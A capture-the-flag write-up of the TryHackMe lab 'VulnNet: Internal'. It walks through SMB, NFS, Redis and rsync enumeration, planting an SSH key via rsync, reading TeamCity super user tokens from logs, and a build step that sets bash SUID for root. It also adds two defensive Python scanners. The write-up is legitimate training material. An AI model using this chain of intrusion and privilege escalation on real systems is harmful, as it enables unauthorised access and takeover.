A room on TryHackMe created by TheCyb3rW0lf featuring various services to exploit.
VulnNet: Internal
Tasks
- services flag
- internal flag
- user flag
- root flag
Vulnerabilities
- Sensitive files in SMB share with Anonymous Login.
- Leaving credentials in files.
- Sensitive files and credentials in Redis.
- Normal user able to read sensitive logs when they should not be.
NMAP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
| 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
| 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 38337/tcp6 mountd
| 100005 1,2,3 40435/udp mountd
| 100005 1,2,3 46762/udp6 mountd
| 100005 1,2,3 56457/tcp mountd
| 100021 1,3,4 40452/udp6 nlockmgr
| 100021 1,3,4 41523/tcp6 nlockmgr
| 100021 1,3,4 42869/udp nlockmgr
| 100021 1,3,4 43173/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync syn-ack (protocol version 31)
2049/tcp open nfs_acl syn-ack 3 (RPC #100227)
9090/tcp filtered zeus-admin no-response
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
| nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| VULNNET-INTERNA<00> Flags: <unique><active>
| VULNNET-INTERNA<03> Flags: <unique><active>
| VULNNET-INTERNA<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 21990/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46838/tcp): CLEAN (Couldn't connect)
| Check 3 (port 19384/udp): CLEAN (Failed to receive data)
| Check 4 (port 39015/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: vulnnet-internal
| NetBIOS computer name: VULNNET-INTERNAL\x00
| Domain name: \x00
| FQDN: vulnnet-internal
|_ System time: 2021-05-14T15:40:20+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-14T13:40:20
|_ start_date: N/A
From our Nmap scan we can see that a lot of service ports are open, such as Samba and NFS. Usually my first step is to check the web server, but since there isn't one we can check out the SMB server first.
Enum4linux
=========================================
| Share Enumeration on 10.10.106.60 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shares Disk VulnNet Business Shares
IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu))
I used Enum4linux, a tool for enumerating SMB; other tools work just as well. We can connect to the 'shares' share using smbclient. In there we will find some sensitive information and our first flag.
NFS
Next we'll proceed with the NFS server, but what actually is NFS?
- It is a client/server system that allows users to access files across a network and treat them as if they resided in a local directory.
- We can use these commands to mount an NFS export on a mount point:
showmount -e $IP
mkdir /tmp/NFS
sudo mount -t nfs $IP:/opt/conf /tmp/NFS
showmount -e $IP lists the exports that are available on the server. Then we create a mount point and mount the export; we can then browse the mounted directory to view its contents. After looking around a bit, I found something interesting in redis.conf:
requirepass "B65Hx562F@ggAZ@F"
Seems like the password for the Redis server.
Redis
Before diving into Redis, what is it actually?
- Redis is an in-memory data structure store, used as a distributed, in-memory key-value database, cache and message broker, with optional durability.
- We can connect with redis-cli:
redis-cli -h $IP
Authenticate with the password we found using AUTH, or supply it with -a on the initial command.
- Since Redis is a key-value store, let's list all keys with KEYS *:
10.10.106.60:6379> KEYS *
1) "internal flag"
2) "authlist"
3) "marketlist"
4) "tmp"
5) "int"
Here is our second flag and some sensitive information, 'authlist' in particular. Checking the type of authlist, it seems to be a list.
- Use LRANGE to list the contents of authlist:
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
- Decoding it in CyberChef confirms it is Base64:
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
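As an added example (not part of the original write-up), here is a small Python check a defender could run over values pulled out of Redis: it base64-decodes each list entry and reports any that match the credential sentence format found in authlist, with the password redacted to its length. The sample entries and the placeholder password are constructed, not the room's data.

```python
import base64
import re

# Constructed sample: the shape of the "authlist" entries this room stored in Redis,
# base64 of "Authorization for rsync://<user>@<host> with password <pw>".
# The password here is a placeholder, not the room's real credential.
SAMPLE_AUTHLIST = [
    base64.b64encode(
        b"Authorization for rsync://rsync-connect@127.0.0.1 with password PLACEHOLDER-PW\n"
    ).decode(),
    "bm90IGEgY3JlZGVudGlhbA==",   # decodes to "not a credential"
    "plain text, not base64!",     # not valid base64 at all
]

# The credential sentence format found in this room's authlist.
CRED_RE = re.compile(
    r"Authorization for (?P<url>\S+://(?P<user>[^@\s]+)@(?P<host>\S+))"
    r" with password (?P<pw>\S+)"
)


def decode_entry(value):
    """Return the decoded text if value is strict base64 of UTF-8 text, else None."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def find_leaked_credentials(entries):
    """Scan Redis list values; return findings with the password redacted to its length."""
    findings = []
    for idx, value in enumerate(entries):
        text = decode_entry(value)
        if text is None:
            continue
        for m in CRED_RE.finditer(text):
            findings.append({
                "index": idx,
                "service": m.group("url").split("://", 1)[0],
                "user": m.group("user"),
                "host": m.group("host"),
                "password_len": len(m.group("pw")),
            })
    return findings


if __name__ == "__main__":
    for f in find_leaked_credentials(SAMPLE_AUTHLIST):
        print(f"entry {f['index']}: {f['service']} credential for "
              f"{f['user']}@{f['host']} (password redacted, {f['password_len']} chars)")
```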
Rsync
- Rsync, or Remote Sync, is a free command-line tool that lets you transfer files and directories to local and remote destinations. Rsync is used for mirroring, performing backups, or migrating data to other servers.
- Let's list what the server shares using this command:
rsync $IP::
- Let's try to connect to the files module using rsync:
rsync $IP::files
Password:
@ERROR: auth failed on module files
rsync error: error starting client-server protocol (code 5) at main.c(1814) [Receiver=3.2.3]
Weird, we're unable to connect even with the correct password.
- Let's try to copy all the files instead:
rsync -av rsync://rsync-connect@$IP/files ctf_files
-a means archive while -v is verbose.
- Opening up the copied files, we have sys-internal, which is the user's home directory, where we find user.txt.
- There is a .ssh folder where we can put our public key.
- We can create an SSH key with ssh-keygen and push the public key into authorized_keys:
rsync -av .ssh/id_rsa.pub rsync://rsync-connect@$IP/files/sys-internal/.ssh/authorized_keys
Later we can log in using the private key.
Privesc
- We don't know the password for sys-internal, but we can upload and run linpeas.sh.
- Unfortunately no exploitable SUID binaries or cron jobs were found.
I had to refer to a write-up for this privesc. Apparently it uses port forwarding.
sys-internal@vulnnet-internal:~$ ss -tno
State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 84 10.10.106.60:2049 10.17.1.163:982 timer:(on,744ms,0)
ESTAB 0 108 10.10.106.60:22 10.17.1.163:47754 timer:(on,784ms,0)
ESTAB 0 0 [::ffff:127.0.0.1]:59073 [::ffff:127.0.0.1]:8111
CLOSE-WAIT 1 0 [::ffff:127.0.0.1]:58999 [::ffff:127.0.0.1]:8111
ESTAB 0 0 [::ffff:127.0.0.1]:8111 [::ffff:127.0.0.1]:59073
Let's see what is on port 8111 by forwarding it over SSH:
sudo ssh sys-internal@10.10.106.60 -i .ssh/id_rsa -L 8111:127.0.0.1:8111
We can now browse to http://127.0.0.1:8111, which brings us to a login page for TeamCity.
- Perhaps there is more on this server. Navigating to / there is a TeamCity directory; there are a lot of directories and files in there, but the interesting one for us CTF players is the logs directory. There were a lot of logs, but I was most interested in catalina.out and teamcity-auth.log:
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
After looking around, I found multiple super user tokens; I tried all of them and one of them worked.
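As an added example (not from the original write-up), here is a Python check for the log exposure this room turns on: it counts the distinct super user tokens in a TeamCity log and reports whether the file is readable by other users, which is the misconfiguration that let sys-internal read them. The log lines below are constructed with placeholder tokens; the permission check assumes a Unix filesystem.

```python
import os
import re
import stat
from collections import Counter

# Line shape seen in this room's catalina.out / teamcity-auth.log.
TOKEN_RE = re.compile(r"\[TeamCity\] Super user authentication token: (\d+)")

# Constructed sample log with placeholder tokens (not the room's real ones).
SAMPLE_LOG = """\
2021-05-14 13:40:20,001 INFO - Server started
[TeamCity] Super user authentication token: 1111111111111111111 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1111111111111111111 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 2222222222222222222 (use empty username with the token as the password to access the server)
2021-05-14 13:41:05,117 INFO - Build agent connected
"""


def super_user_tokens(log_text):
    """Return a Counter of distinct super user tokens and how often each was logged."""
    return Counter(TOKEN_RE.findall(log_text))


def world_readable(path):
    """True if 'other' has read permission on path (what let a normal user read the logs)."""
    mode = os.stat(path).st_mode
    return bool(mode & stat.S_IROTH)


def audit_log_file(path):
    """Combine both checks: tokens present in a log that non-privileged users can read."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        tokens = super_user_tokens(fh.read())
    return {
        "path": path,
        "tokens_logged": len(tokens),
        "world_readable": world_readable(path),
        "exposed": bool(tokens) and world_readable(path),
    }


if __name__ == "__main__":
    import sys
    for log_path in sys.argv[1:]:
        result = audit_log_file(log_path)
        flag = "EXPOSED" if result["exposed"] else "ok"
        print(f"{flag}: {log_path} ({result['tokens_logged']} super user token(s), "
              f"world-readable={result['world_readable']})")
```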
- Now let's manually create a project and then create a build configuration for it.
- Now navigate back to the project and edit the build configuration. Next, add a build step and choose Command Line as the type. Now create a malicious script: assuming this super user account can run with root privileges, let's set bash as SUID:
chmod u+s /bin/bash
Now let's run the build and check the permissions on bash:
bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1113504 Apr 4 2018 /bin/bash
Now simply run the binary to get root privileges:
bash-4.4$ /bin/bash -p
bash-4.4# whoami
root
In the end this was an interesting room and I learned a lot about internal services and a new way for privesc.